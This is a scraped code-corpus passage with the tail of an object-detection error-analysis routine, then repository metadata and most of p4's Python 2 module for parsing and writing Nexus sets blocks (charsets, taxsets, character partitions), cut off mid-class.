os.makedirs(det_error_dir) det_error_file = os.path.join(det_error_dir, 'det_error_file.txt') stats = self.analyze_detections(det_file_dir, det_error_file) ims = self.visualize_detections( image_dir=self._image_path, image_format='.png', det_error_file=det_error_file, output_image_dir=det_error_dir, num_det_per_type=10 ) return stats, ims def analyze_detections(self, detection_file_dir, det_error_file): def _save_detection(f, idx, error_type, det, score): f.write( '{:s} {:s} {:.1f} {:.1f} {:.1f} {:.1f} {:s} {:.3f}\n'.format( idx, error_type, det[0]-det[2]/2., det[1]-det[3]/2., det[0]+det[2]/2., det[1]+det[3]/2., self._classes[int(det[4])], score ) ) # load detections self._det_rois = {} for idx in self._image_idx: det_file_name = os.path.join(detection_file_dir, idx+'.txt') with open(det_file_name) as f: lines = f.readlines() f.close() bboxes = [] for line in lines: obj = line.strip().split(' ') cls = self._class_to_idx[obj[0].lower().strip()] xmin = float(obj[4]) ymin = float(obj[5]) xmax = float(obj[6]) ymax = float(obj[7]) score = float(obj[-1]) x, y, w, h = bbox_transform_inv([xmin, ymin, xmax, ymax]) bboxes.append([x, y, w, h, cls, score]) bboxes.sort(key=lambda x: x[-1], reverse=True) self._det_rois[idx] = bboxes # do error analysis num_objs = 0. num_dets = 0. num_correct = 0. num_loc_error = 0. num_cls_error = 0. num_bg_error = 0. num_repeated_error = 0. num_detected_obj = 0. with open(det_error_file, 'w') as f: for idx in self._image_idx: gt_bboxes = np.array(self._rois[idx]) num_objs += len(gt_bboxes) detected = [False]*len(gt_bboxes) det_bboxes = self._det_rois[idx] if len(gt_bboxes) < 1: continue for i, det in enumerate(det_bboxes): if i < len(gt_bboxes): num_dets += 1 ious = batch_iou(gt_bboxes[:, :4], det[:4]) max_iou = np.max(ious) gt_idx = np.argmax(ious) if max_iou > 0.1: if gt_bboxes[gt_idx, 4] == det[4]: if max_iou >= 0.5: if i < len(gt_bboxes): if not detected[gt_idx]: num_correct += 1 detected[gt_idx] = True else: num_repeated_error += 1 else: if i < len(gt_bboxes): num_loc_error += 1 _save_detection(f, idx, 'loc', det, det[5]) else: if i < len(gt_bboxes): num_cls_error += 1 _save_detection(f, idx, 'cls', det, det[5]) else: if i < len(gt_bboxes): num_bg_error += 1 _save_detection(f, idx, 'bg', det, det[5]) for i, gt in enumerate(gt_bboxes): if not detected[i]: _save_detection(f, idx, 'missed', gt, -1.0) num_detected_obj += sum(detected) f.close() print ('Detection Analysis:') print (' Number of detections: {}'.format(num_dets)) print (' Number of objects: {}'.format(num_objs)) print (' Percentage of correct detections: {}'.format( num_correct/num_dets)) print (' Percentage of localization error: {}'.format( num_loc_error/num_dets)) print (' Percentage of classification error: {}'.format( num_cls_error/num_dets)) print (' Percentage of background error: {}'.format( num_bg_error/num_dets)) print (' Percentage of repeated detections: {}'.format( num_repeated_error/num_dets)) print (' Recall: {}'.format( num_detected_obj/num_objs)) out = {} out['num of detections'] = num_dets out['num of objects'] = num_objs out['% correct detections'] = num_correct/num_dets out['% localization error'] = num_loc_error/num_dets out['% classification error'] = num_cls_error/num_dets out['% background error'] = num_bg_error/num_dets out['% repeated error'] = num_repeated_error/num_dets out['% recall'] = num_detected_obj/num_objs return out
bsd-2-clause
-1,532,657,115,107,445,500
33.743243
82
0.550661
false
blaiseli/p4-phylogenetics
p4/nexussets.py
1
69575
import os import sys import string import array import types import copy from var import var # Don't bother with NexusToken2, cuz sets blocks are small from nexustoken import nexusSkipPastNextSemiColon, safeNextTok import func from p4exceptions import P4Error # [Examples from the paup manual, # but note the bad charpartition subset names '1' and '2'. P4 would not allow those names.] # charset coding = 2-457 660-896; # charset noncoding = 1 458-659 897-898; # charpartition gfunc = 1:coding, 2:noncoding; # Notes from MadSwofMad97. # TaxSet taxset-name [({Standard | Vector})] = taxon-set; # standard is default # TaxPartition partition-name [([{[No]Tokens}] # tokens is default # [{standard|vector}])] # standard is default # = subset-name:taxon-set [, subset-name:taxon-set...]; # eg TaxSet outgroup=1-4; # TaxSet beetles=Omma-.; # # taxpartition populations=1:1-3, 2:4-6, 3:7 8; # note bad taxpartition names 1, 2, 3 # taxpartition populations (vector notokens) = 11122233; # class CaseInsensitiveDict(dict): """A dictionary that is case insensitive, for Nexus""" def __init__(self, default=None): dict.__init__(self) self.default = default #self.keyDict = {} def __setitem__(self, key, val): if type(key) != types.StringType: gm = ["CaseInsensitiveDict()"] gm.append("The key must be a string. Got '%s'" % key) raise P4Error(gm) lowKey = string.lower(key) dict.__setitem__(self, lowKey, val) #self.keyDict[string.lower(key)] = key def __getitem__(self, key): if type(key) != types.StringType: gm = ["CaseInsensitiveDict()"] gm.append("The key must be a string. Got '%s'" % key) raise P4Error(gm) lowKey = string.lower(key) try: return dict.__getitem__(self, lowKey) except KeyError: return self.default def get(self, key, *args): if not args: args = (self.default,) return dict.get(self, key, *args) ######################################################################### # CLASS NexusSets ######################################################################### class NexusSets(object): """A container for Nexus CharSet, CharPartition, and TaxSet objects. When the first Nexus sets block is read, a NexusSets object is made and saved as ``var.nexusSets``. ``CharSet``, ``TaxSet``, and ``CharPartition`` objects are placed in it, as they are read/created. TaxPartition commands are not implemented. Here is a simple nexus sets block that only has charsets:: #nexus begin sets; charset pos1 = 1-.\\3; charset pos2 = 2-.\\3; charset pos3 = 3-.\\3; end; To get the third positions only, you could say:: read('myAlignment.phy') a = var.alignments[0] read('mySets.nex') # the sets block above b = a.subsetUsingCharSet('pos3') What happens above when the mySets.nex file is read is that a NexusSets object is created as ``var.nexusSets`` and populated with the three charsets as CharSet objects. Then when you asked for a subset, a copy of that NexusSets object was made and applied to the alignment. Notice that the length of the alignment is not part of the information in the sets block, and so things remain undefined in ``var.nexusSets`` until the nexus sets are applied to a particular alignment. One consequence of this somewhat awkward system is that the same charsets could then be applied to another alignment of a different size:: read('myAlignment.phy') aA = var.alignments[0] read('anotherAlignment.nex') aB = var.alignments[1] read('mySets.nex') # the sets block above bA = aA.subsetUsingCharSet('pos3') bB = aB.subsetUsingCharSet('pos3') In the above example, ``bA.nexusSets`` and ``bB.nexusSets`` are both derived from ``var.nexusSets`` but are independent of it, and different from each other. So when an Alignment (or Tree object) wants to use ``var.nexusSets``, it makes a copy of it, and attaches the copy as theAlignment.nexusSets or theTree.nexusSets Here is another example, including a ``charPartition`` definition:: begin sets; charset gene1 = 1-213; charset gene2 = 214-497; charPartition cpName = gene1:gene1, gene2:gene2; end; For an alignment, you can then set a **character partition** by :: a.setCharPartition(cpName) Do this *before* you make a Data object, to partition the alignment. You can also use charsets to extract subsets, eg via:: b = a.subsetUsingCharSet(csName) Setting a charPartition or asking for a subset will trigger applying ``var.nexusSets`` to the alignment, but you can also do it explicitly, by:: myTree.setNexusSets() NexusSets knows about predefined 'constant', 'gapped', and 'remainder' charsets. It does not know about 'missambig' or 'uninf' charsets. NexusSets can either be in the default standard format or in vector format -- you can change them to vector format with the :: mySet.vectorize() method, and you can change them to standard format with the :: mySet.standardize() method. For taxSets, you can use actual tax names (rather than numbers or ranges) by invoking the method:: myTaxSet.setUseTaxNames() which sets the attribute 'useTaxNames' to True, and puts the taxNames for the taxSet in the :: taxSet.taxNames list, which might be handy. You can see the current state of a NexusSets object using :: myNexusSets.dump() It can also be written out as a nexus sets block. If an Alignment object has a ``nexusSets`` attribute then if you ask the alignment to write itself to a nexus file then the Alignment.nexusSets is also written. If you would rather it not be written, delete it first. If you would rather it be written to a separate file, do that first and then delete it. One nice thing about taxsets is that :meth:`Tree.Tree.tv` and :meth:`Tree.Tree.btv` know about them and can display them. """ def __init__(self): self.charSets = [] self.charSetsDict = CaseInsensitiveDict() self.charSetLowNames = [] self.taxSets = [] self.taxSetsDict = CaseInsensitiveDict() self.taxSetLowNames = [] self.charPartitions = [] self.charPartitionsDict = CaseInsensitiveDict() self.charPartitionLowNames = [] self.charPartition = None #self.alignment = None self.aligNChar = None self.taxNames = [] self.nTax = None self.predefinedCharSetLowNames = ['constant', 'gapped'] # The nexus format defines several "predefined" charSets. # For all datatypes: # constant # gapped # missambig # remainder # uninf # I only have implemented 2-- constant and gapped. The # 'remainder' charSet is handled by p4, but not as a CharSet # object, since its content depends on the context. cS = CharSet(self) cS.num = -1 cS.name = 'constant' cS.lowName = 'constant' cS.format = 'vector' # self.charSets.append(cS) self.constant = cS self.charSetsDict['constant'] = self.constant cS = CharSet(self) cS.num = -1 cS.name = 'gapped' cS.lowName = 'gapped' cS.format = 'vector' # self.charSets.append(cS) self.gapped = cS self.charSetsDict['gapped'] = self.gapped def _continueReadingFromNexusFile(self, flob): gm = ['NexusSets._continueReadingFromNexusFile()'] if hasattr(flob, 'name') and flob.name: gm.append("file name %s" % flob.name) if 0: print gm[0] print ' var.nexus_doFastNextTok = %s' % var.nexus_doFastNextTok nexusSkipPastNextSemiColon(flob) commandName = safeNextTok(flob, gm[0]) lowCommandName = string.lower(commandName) # print 'got lowCommandName = %s' % lowCommandName while lowCommandName not in [None, 'end', 'endblock']: # print "Got lowCommandName '%s'" % lowCommandName if lowCommandName == 'charset': self._readCharSetCommand(flob) elif lowCommandName == 'charpartition': self._readCharPartitionCommand(flob) elif lowCommandName == 'taxset': self._readTaxSetCommand(flob) elif lowCommandName == 'taxpartition': print print gm[0] if len(gm) > 1: print gm[1] print " Sorry-- taxpartition is not implemented." nexusSkipPastNextSemiColon(flob) else: gm.append("Got unrecognized sets block command '%s'" % commandName) raise P4Error(gm) commandName = safeNextTok( flob, 'NexusSets.continueReadingFromNexusFile()') lowCommandName = string.lower(commandName) def _readCharSetCommand(self, flob): # We have just read 'charset'. The next thing we expect is the charset # name. gm = ['NexusSets._readCharSetCommand()'] if hasattr(flob, 'name') and flob.name: gm.append("file name %s" % flob.name) name = func.nexusUnquoteName( safeNextTok(flob, 'NexusSets: _readCharSetCommand')) # print "readCharSetCommand: got name '%s'" % name lowName = string.lower(name) if not func.nexusCheckName(lowName): gm.append("Bad charSet name '%s'" % name) raise P4Error(gm) # Check for duped names if lowName in self.charSetLowNames: gm.append("Duplicated charSet name '%s'" % name) raise P4Error(gm) elif lowName in self.predefinedCharSetLowNames: gm.append( "You cannot use the name '%s' -- it is predefined." % name) raise P4Error(gm) cs = CharSet(self) cs.name = name cs.lowName = lowName cs.readTaxOrCharSetDefinition(flob) cs.num = len(self.charSets) self.charSets.append(cs) self.charSetsDict[name] = cs self.charSetLowNames.append(cs.lowName) def _readTaxSetCommand(self, flob): # We have just read 'taxset'. The next thing we expect is the taxset # name. gm = ['NexusSets._readTaxSetCommand()'] if hasattr(flob, 'name') and flob.name: gm.append("file name %s" % flob.name) name = func.nexusUnquoteName( safeNextTok(flob, 'NexusSets: readTaxSetCommand')) # print "readTaxSetCommand: got name '%s'" % name lowName = string.lower(name) if not func.nexusCheckName(lowName): gm.append("Bad taxSet name '%s'" % name) raise P4Error(gm) # Check for duped names if lowName in self.taxSetLowNames: gm.append("Duplicated taxSet name '%s'" % name) raise P4Error(gm) ts = TaxSet(self) ts.name = name ts.lowName = lowName ts.readTaxOrCharSetDefinition(flob) ts.num = len(self.taxSets) self.taxSets.append(ts) self.taxSetsDict[name] = ts self.taxSetLowNames.append(ts.lowName) def _readCharPartitionCommand(self, flob): gm = ['NexusSets._readCharPartitionCommand()'] if hasattr(flob, 'name') and flob.name: gm.append("file name %s" % flob.name) name = func.nexusUnquoteName(safeNextTok(flob, gm[0])) # print "readCharPartitionCommand: got name '%s'" % name lowName = string.lower(name) if not func.nexusCheckName(lowName): gm.append("Bad charPartition name '%s'" % name) if lowName in self.charPartitionLowNames: gm.append("Duplicated charPartition name '%s'" % name) raise P4Error(gm) cp = CharPartition(self) cp.name = name cp.lowName = lowName cp._readCharPartitionDefinition(flob) self.charPartitions.append(cp) self.charPartitionsDict[name] = cp self.charPartitionLowNames.append(cp.lowName) def dump(self): print " NexusSets dump" if self.constant: print " Predefined char set 'constant'" self.constant.dump() if self.gapped: print " Predefined char set 'gapped'" self.gapped.dump() print " There are %i non-predefined char sets" % len(self.charSets) for cs in self.charSets: cs.dump() print " There are %i tax sets" % len(self.taxSets) for ts in self.taxSets: ts.dump() print " There are %i char partitions" % len(self.charPartitions) for cp in self.charPartitions: cp.dump() if self.charPartition: print " self.charPartition.name is %s" % func.nexusFixNameIfQuotesAreNeeded(self.charPartition.name) else: print " There is no self.charPartition" def write(self): """Write self in Nexus format to stdout.""" self.writeNexusToOpenFile(sys.stdout) def writeNexus(self, fName=None): """Write self in Nexus format to stdout or a file.""" if fName: f = file(fName, 'w') else: f = sys.stdout f.write('#nexus\n\n') self.writeNexusToOpenFile(f) if fName: f.close() def writeNexusToOpenFile(self, flob): """This only writes non-trivial stuff. Ie if self has only constant and gapped charsets, then it does not write anything.""" if self.charSets or self.charPartitions or self.taxSets: flob.write('begin sets;\n') for cs in self.charSets: cs.writeNexusToOpenFile(flob) for cp in self.charPartitions: cp.writeNexusToOpenFile(flob) for ts in self.taxSets: ts.writeNexusToOpenFile(flob) flob.write('end;\n\n') def newCharSet(self, name, mask=None): cs = CharSet(self) cs.name = name cs.name = name.lower() cs.num = len(self.charSets) if mask: cs.format = 'vector' cs.mask = mask else: pass self.charSets.append(cs) self.charSetsDict[cs.name] = cs def dupeCharSet(self, existingCharSetName, newName): theCS = self.charSetsDict.get(existingCharSetName) if not theCS: raise P4Error( "NexusSets.dupeCharSet() -- can't find char set '%s'" % existingCharSetName) cs = CharSet(self) cs.name = newName cs.name = newName.lower() cs.num = len(self.charSets) self.charSets.append(cs) self.charSetsDict[cs.name] = cs cs.format = theCS.format cs.triplets = copy.deepcopy(theCS.triplets) # its a list of lists cs.tokens = theCS.tokens[:] cs.mask = theCS.mask cs.aligNChar = theCS.aligNChar class TaxOrCharSet(object): def __init__(self, theNexusSets): self.nexusSets = theNexusSets self.num = -1 self.name = None self.lowName = None self._format = 'standard' # or 'vector' So it should be a property. self.triplets = [] self.tokens = [] self.mask = None self.className = 'TaxOrCharSet' self.lowTaxNames = [] self.taxNames = [] self.useTaxNames = None # undecided def _getFormat(self): return self._format def _setFormat(self, newFormat): assert newFormat in ['standard', 'vector'] self._format = newFormat format = property(_getFormat, _setFormat) def dump(self): print " %s %i" % (self.className, self.num) print " name: %s" % self.name if hasattr(self, 'aligNChar'): print " aligNChar: %s" % self.aligNChar print " format: %s" % self.format if hasattr(self, 'useTaxNames'): print " useTaxNames: %s" % self.useTaxNames print " triplets: " for t in self.triplets: print " %s" % t if hasattr(self, 'numberTriplets'): print " numberTriplets: " for t in self.numberTriplets: print " %s" % t print " tokens: %s" % self.tokens print " mask: %s" % self.mask if self.mask: print " mask 1s-count: %s" % self.mask.count('1') def readTaxOrCharSetDefinition(self, flob): gm = ['%s.readTaxSetDefinition()' % self.className] if hasattr(flob, 'name') and flob.name: gm.append("file name %s" % flob.name) tok = safeNextTok(flob, gm[0]) lowTok = string.lower(tok) # print "readTaxSetDefinition: get tok '%s'" % tok if lowTok == '=': pass elif lowTok == '(': #['standard', 'vector']: tok = func.nexusUnquoteName(safeNextTok(flob, gm[0])) lowTok = string.lower(tok) if lowTok == 'standard': pass elif lowTok == 'vector': self.format = 'vector' else: gm.append("Unexpected '%s'" % tok) gm.append("(I was expecting either 'standard' or") gm.append("'vector' following the parenthesis.)") raise P4Error(gm) tok = func.nexusUnquoteName(safeNextTok(flob, gm[0])) if tok == ')': pass else: gm.append("Unexpected '%s'" % tok) gm.append( "(I was expecting an unparentheis after '%s')" % self.format) raise P4Error(gm) tok = func.nexusUnquoteName(safeNextTok(flob, gm[0])) if tok != '=': gm.append("Unexpected '%s'" % tok) gm.append("I was expecting an '=' after '(%s)'" % self.format) raise P4Error(gm) else: gm.append("Unexpected '%s'" % tok) raise P4Error(gm) # Now we are on the other side of the '=' tok = func.nexusUnquoteName(safeNextTok(flob, gm[0])) lowTok = string.lower(tok) while lowTok not in [None, ';', 'end', 'endblock']: self.tokens.append(tok) tok = func.nexusUnquoteName(safeNextTok(flob, gm[0])) lowTok = string.lower(tok) if self.format == 'vector': self.mask = string.join(self.tokens, '') self.tokens = [] for i in range(len(self.mask)): if self.mask[i] not in ['0', '1']: gm.append("%s '%s', vector format" % (self.className, self.name)) gm.append("The vector must be all zeros or ones.") raise P4Error(gm) # print self.mask # do a once-over sanity check, and convert integer strings to ints # print "xx1 self.tokens is now %s" % self.tokens for tokNum in range(len(self.tokens)): tok = self.tokens[tokNum] lowTok = string.lower(tok) if lowTok in ['.', 'all', '-', '\\']: pass elif self.className == 'CharSet' and lowTok in self.nexusSets.charSetLowNames: # print " xx3 %s is an existing charSet" % tok pass elif self.className == 'CharSet' and lowTok in self.nexusSets.predefinedCharSetLowNames: # print " xx3 %s is a pre-defined charSet" % tok pass elif self.className == 'TaxSet' and lowTok in self.nexusSets.taxSetLowNames: # print " xx4 %s is an existing taxSet" % tok pass else: # print " xx5" try: intTok = int(tok) self.tokens[tokNum] = intTok except ValueError: if self.className == 'TaxSet': pass elif self.className == 'CharSet': gm.append("I don't understand the token '%s'" % tok) raise P4Error(gm) # Now I want to make a list of triplets representing eg 23-87\3 # first item = 23, second item = 87, third = 3 # not all will exist for each part of the char definition. tokNum = 0 self.triplets = [] while tokNum < len(self.tokens): tok = self.tokens[tokNum] # print "Considering tok[%i] '%s'" % (tokNum, tok) if type(tok) == type('str'): lowTok = string.lower(tok) else: lowTok = None if self.className == 'TaxSet' and lowTok in self.nexusSets.taxSetLowNames or \ self.className == 'charSet' and lowTok in self.nexusSets.charSetLowNames: aTriplet = [tok, None, None] self.triplets.append(aTriplet) tokNum += 1 if tokNum < len(self.tokens): if self.tokens[tokNum] == '-': gm.append("%s '%s' definition" % (self.className, self.name)) gm.append( "An existing tax or char set may not be followed by a '-'") raise P4Error(gm) if self.tokens[tokNum] == '\\': gm.append("%s '%s' definition" % (self.className, self.name)) gm.append( "An existing tax or char set may not be followed by a '\\'") raise P4Error(gm) elif tok == 'all': aTriplet = [tok, None, None] self.triplets.append(aTriplet) tokNum += 1 if tokNum < len(self.tokens): if self.tokens[tokNum] == '-': gm.append("%s '%s' definition" % (self.className, self.name)) gm.append( "Tax or char set 'all' may not be followed by a '-'") raise P4Error(gm) if self.tokens[tokNum] == '\\': gm.append("%s '%s' definition" % (self.className, self.name)) gm.append( "Tax or char set 'all' may not be followed by a '\\'") raise P4Error(gm) elif tok == '-': gm.append("%s '%s' definition" % (self.className, self.name)) gm.append("Out of place '-'") raise P4Error(gm) elif tok == '\\': gm.append("%s '%s' definition" % (self.className, self.name)) gm.append("Out of place '\\'") raise P4Error(gm) elif tok == '.': aTriplet = [tok, None, None] self.triplets.append(aTriplet) tokNum += 1 if tokNum < len(self.tokens): if self.tokens[tokNum] == '-': gm.append("%s '%s' definition" % (self.className, self.name)) gm.append( "Tax or char set '.' may not be followed by a '-'") raise P4Error(gm) if self.tokens[tokNum] == '\\': gm.append("%s '%s' definition" % (self.className, self.name)) gm.append( "Tax or char set '.' may not be followed by a '\\'") raise P4Error(gm) elif type(tok) == type(1) or type(tok) == type('str'): aTriplet = [tok, None, None] tokNum += 1 if tokNum < len(self.tokens): if self.tokens[tokNum] == '-': tokNum += 1 if tokNum < len(self.tokens): # maybe '.' if type(self.tokens[tokNum]) == type('str'): aTriplet[1] = self.tokens[tokNum] elif type(self.tokens[tokNum]) == type(1): if type(aTriplet[0]) == type(1): if self.tokens[tokNum] > aTriplet[0]: aTriplet[1] = self.tokens[tokNum] else: gm.append( "%s '%s' definition" % (self.className, self.name)) gm.append( "If a range is defined by two numbers,") # gm.append("(as it appears to be -- %s %s %s)" % ( # aTriplet[0], aTriplet[1], # aTriplet[2])) gm.append( "the second number of a range must be bigger than") gm.append("the first.") raise P4Error(gm) else: aTriplet[1] = self.tokens[tokNum] else: raise P4Error(gm) tokNum += 1 if tokNum < len(self.tokens): if self.tokens[tokNum] == '\\': tokNum += 1 if tokNum < len(self.tokens): if type(self.tokens[tokNum]) == type(1): aTriplet[2] = self.tokens[tokNum] else: gm.append( "%s '%s' definition" % (self.className, self.name)) gm.append( "Step value of a range must be a number") gm.append("(Got '%s')" % self.tokens[tokNum]) raise P4Error(gm) tokNum += 1 self.triplets.append(aTriplet) # print "xxy self.mask = %s" % self.mask if not self.triplets and not self.mask: if not var.allowEmptyCharSetsAndTaxSets: gm.append("%s '%s' definition" % (self.className, self.name)) gm.append("Got no definition (no triplets or mask)") gm.append("(Allow this by turning var.allowEmptyCharSetsAndTaxSets on)") raise P4Error(gm) if 0: print gm[0] print " Got self.triplets %s" % self.triplets def setMask(self): """Set self.mask.""" gm = ["%s.setMask() name='%s'" % (self.className, self.name)] if self.format == 'vector': if self.mask: pass else: gm.append("vector format, but no mask?") raise P4Error(gm) elif self.format == 'standard': if 0: print gm[0] self.dump() if not len(self.triplets): if not var.allowEmptyCharSetsAndTaxSets: gm.append( "standard format, but we have no triplets? - no definition?") gm.append("(Allow this by turning var.allowEmptyCharSetsAndTaxSets on.)") raise P4Error(gm) if self.className == 'CharSet': thisMaskLen = self.aligNChar existingSetNames = self.nexusSets.charSetLowNames existingSets = self.nexusSets.charSets theTriplets = self.triplets elif self.className == 'TaxSet': thisMaskLen = self.nexusSets.nTax existingSetNames = self.nexusSets.taxSetLowNames existingSets = self.nexusSets.taxSets theTriplets = self.numberTriplets mask = array.array('c', thisMaskLen * '0') for aTriplet in theTriplets: if 0: print gm[0] print " '%s' aTriplet=%s" % (self.name, aTriplet) first = aTriplet[0] second = aTriplet[1] third = aTriplet[2] lowFirst = None lowSecond = None if type(first) == type('str'): lowFirst = string.lower(first) if type(second) == type('str'): lowSecond = string.lower(second) # its a single, or an existing set, not a range if first and not second: if lowFirst: if lowFirst == 'all': for i in range(thisMaskLen): mask[i] = '1' if lowFirst in existingSetNames: for aSet in existingSets: if lowFirst == aSet.lowName: if not aSet.mask: aSet.setMask() for j in range(thisMaskLen): if aSet.mask[j] == '1': mask[j] = '1' # Maybe its a predefined charset --- constant or gapped elif self.className == 'CharSet' and lowFirst in self.nexusSets.predefinedCharSetLowNames: aSet = None if lowFirst == 'constant': aSet = self.nexusSets.constant elif lowFirst == 'gapped': aSet = self.nexusSets.gapped assert aSet for j in range(thisMaskLen): if aSet.mask[j] == '1': mask[j] = '1' else: gm.append("I don't know '%s'" % first) raise P4Error(gm) elif first == '.': mask[-1] = '1' elif type(first) == type(1): if first > 0 and first <= thisMaskLen: mask[first - 1] = '1' else: # This will have been checked before. gm.append( "Component '%s' is out of range of mask len (%s)" % (first, thisMask)) raise P4Error(gm) elif first and second: # Its a range. start = int(first) if second == '.': fin = len(mask) else: fin = int(second) if third: bystep = int(third) # print "mask len %i, start-1 %i, fin %i, bystep %i" % # (len(mask), (start-1), fin, bystep) for spot in range(start - 1, fin, bystep): mask[spot] = '1' else: for spot in range(start - 1, fin): mask[spot] = '1' # print " finished incorporating triplet %s into # '%s' mask." % (aTriplet, self.name) mask = mask.tostring() # print "Got char set '%s' mask '%s'" % (self.name, mask) self.mask = mask def invertMask(self): """Change zeros to ones, and non-zeros to zero.""" gm = ['%s.invertMask()' % self.className] if not self.mask: self.dump() gm.append("The charset has no mask") raise P4Error(gm) self.mask = list(self.mask) for i in range(len(self.mask)): if self.mask[i] == '0': self.mask[i] = '1' else: self.mask[i] = '0' self.mask = string.join(self.mask, '') def write(self): """Write self in Nexus format to stdout.""" self.writeNexusToOpenFile(sys.stdout) def writeNexus(self): """Write self in Nexus format to stdout.""" self.writeNexusToOpenFile(sys.stdout) def writeNexusToOpenFile(self, flob): if self.className == 'CharSet': theSetName = 'charSet' else: theSetName = 'taxSet' if self.format == 'standard': flob.write(' %s %s =' % (theSetName, self.name)) if self.useTaxNames: for tN in self.taxNames: flob.write(" %s" % func.nexusFixNameIfQuotesAreNeeded(tN)) else: # for i in self.tokens: # flob.write(' %s' % i) previousTok = None for theTok in self.tokens: if type(theTok) == types.StringType: if theTok not in ['-', '\\']: tok = func.nexusFixNameIfQuotesAreNeeded(theTok) else: tok = theTok else: tok = theTok if previousTok != None: # tokens will be either ints or strings previousType = type(previousTok) # print "previousTok = %s, previousType = %s" % # (previousTok, previousType) # usually put in a space if type(tok) == previousType: # except in this case if tok in ['-'] or previousTok in ['-']: flob.write('%s' % tok) else: flob.write(' %s' % tok) else: # usually no space if tok in ['-'] or previousTok in ['-']: flob.write('%s' % tok) else: # except in this case flob.write(' %s' % tok) previousTok = tok # print "previousTok = %s, previousType = %s" % # (previousTok, previousType) else: flob.write(' %s' % tok) previousTok = tok flob.write(';\n') elif self.format == 'vector': flob.write(' %s %s (vector) = ' % (theSetName, self.name)) flob.write('%s;\n' % self.mask) def vectorize(self): if self.format == 'vector': return if not self.mask: self.setMask() #self.triplets = [] #self.tokens = [] self.format = 'vector' def standardize(self): if self.format == 'standard': return self.triplets = [] self.tokens = [] thisTriplet = [] for mPos in range(len(self.mask)): # print "mPos=%i mask=%s thisTriplet=%s" % (mPos, # self.mask[mPos], thisTriplet) if self.mask[mPos] == '0': if thisTriplet: if thisTriplet[0] == mPos: thisTriplet.append(None) thisTriplet.append(None) else: thisTriplet.append(mPos) thisTriplet.append(None) # print " finished triplet -- %s" % thisTriplet self.triplets.append(thisTriplet) thisTriplet = [] else: if thisTriplet: pass else: thisTriplet.append(mPos + 1) # print " started triplet -- %s" % thisTriplet if thisTriplet: if thisTriplet[0] == len(self.mask): thisTriplet.append(None) thisTriplet.append(None) else: thisTriplet.append(mPos + 1) thisTriplet.append(None) # print " finished last triplet -- %s" % thisTriplet self.triplets.append(thisTriplet) # print self.triplets for triplet in self.triplets: if triplet[1] == None: self.tokens.append(triplet[0]) else: self.tokens.append(triplet[0]) self.tokens.append('-') self.tokens.append(triplet[1]) self.format = 'standard' # self.dump() class CharSet(TaxOrCharSet): def __init__(self, theNexusSets): TaxOrCharSet.__init__(self, theNexusSets) self.className = 'CharSet' self.aligNChar = None def getNChar(self): self.setMask() return self.mask.count('1') def setAligNChar(self, aligNChar): gm = ['CharSet.setAligNChar()'] # print "CharSet name=%s, format=%s, aligNChar=%i" % (self.name, # self.format, aligNChar) self.aligNChar = aligNChar if self.format == 'standard': for aTriplet in self.triplets: first = aTriplet[0] second = aTriplet[1] third = aTriplet[2] if first and not second: # its a single if type(first) == type(1): if first > 0 and first <= self.aligNChar: pass else: gm.append("Charset '%s' definition" % self.name) gm.append( "Charset definition element '%s' is out of range" % first) gm.append("(aligNChar = %i)" % self.aligNChar) raise P4Error(gm) pass elif first and second: # its a range try: start = int(first) except ValueError: gm.append("Charset '%s' definition" % self.name) gm.append( "Can't parse definition element '%s'" % first) raise P4Error(gm) if second == '.': fin = self.aligNChar else: try: fin = int(second) except ValueError: gm.append("Charset '%s' definition" % self.name) gm.append( "Can't parse definition element '%s'" % second) raise P4Error(gm) if third: try: bystep = int(third) except ValueError: gm.append("Charset '%s' definition" % self.name) gm.append( "Can't parse definition element '%s'" % third) raise P4Error(gm) elif self.format == 'vector': # print "charset %s, vector format %s, mask %s" % (self.name, # self.format, self.mask) if self.mask: if len(self.mask) == self.aligNChar: pass else: gm.append("len(self.mask) is %i, but aligNChar is %i" % ( len(self.mask), self.aligNChar)) raise P4Error(gm) else: gm.append("bad format %s" % self.format) raise P4Error(gm) class TaxSet(TaxOrCharSet): def __init__(self, theNexusSets): TaxOrCharSet.__init__(self, theNexusSets) self.className = 'TaxSet' self.numberTriplets = [] def setNumberTriplets(self): gm = ['TaxSet.setNumberTriplets()'] if not self.nexusSets.lowTaxNames: self.nexusSets.lowTaxNames = [ string.lower(txName) for txName in self.nexusSets.taxNames] self.numberTriplets = [] # print "self.triplets = %s" % self.triplets for tr in self.triplets: # print "setNumberTriplets() tr=%s" % tr numTr = [] for itemNum in range(2): trItem = tr[itemNum] # print " considering '%s'" % trItem if trItem == None: numTr.append(trItem) elif type(trItem) == type(1): numTr.append(trItem) elif trItem == '.': numTr.append(self.nexusSets.nTax) else: assert type(trItem) == type('str') lowTrItem = string.lower(trItem) if lowTrItem in self.nexusSets.taxSetLowNames: numTr.append(trItem) else: if lowTrItem not in self.nexusSets.lowTaxNames: gm.append("Triplet %s" % tr) gm.append( "'%s' is a string, but not in the taxNames." % trItem) raise P4Error(gm) theIndx = self.nexusSets.lowTaxNames.index(lowTrItem) theIndx += 1 numTr.append(theIndx) trItem = tr[2] if trItem == None: numTr.append(None) else: assert type(trItem) == type(1) numTr.append(trItem) assert len(numTr) == 3 # print numTr first = numTr[0] # first might be a pre-existing taxSet name if type(first) == type('str'): pass else: second = numTr[1] assert type(first) == type(1) and first != 0 if type(second) == type(1): assert second != 0 if second <= first: gm.append("Triplet %s" % tr) gm.append("Triplet expressed as numbers. %s" % numTr) gm.append( "This appears to be a range, but the second number") gm.append("is not bigger than the first.") raise P4Error(gm) assert second <= self.nexusSets.nTax assert first <= self.nexusSets.nTax self.numberTriplets.append(numTr) def setUseTaxNames(self): if self.useTaxNames: return # if not self.mask: # self.setMask() if not self.taxNames: for pos in range(len(self.mask)): c = self.mask[pos] if c == '1': self.taxNames.append(self.nexusSets.taxNames[pos]) self.useTaxNames = True class CharPartitionSubset(object): def __init__(self): self.name = None self.lowName = None self.tokens = [] self.mask = None self.triplets = [] def dump(self): print " -- CharPartitionSubset" print " name: %s" % func.nexusFixNameIfQuotesAreNeeded(self.name) print " triplets: " for t in self.triplets: print " %s" % t print " tokens: %s" % self.tokens # for t in self.tokens: # print " %s" % t print " mask: %s" % self.mask def writeNexusToOpenFile(self, flob): flob.write('%s:' % self.name) # print self.tokens # for i in self.tokens: # flob.write(' %s' % i) previousTok = None for i in self.tokens: if previousTok != None: # tokens will be either ints or strings previousType = type(previousTok) # print "previousTok = %s, previousType = %s" % (previousTok, # previousType) if type(i) == previousType: # put in a space flob.write(' %s' % i) else: # no space flob.write('%s' % i) previousTok = i else: flob.write(' %s' % i) previousTok = i class CharPartition(object): def 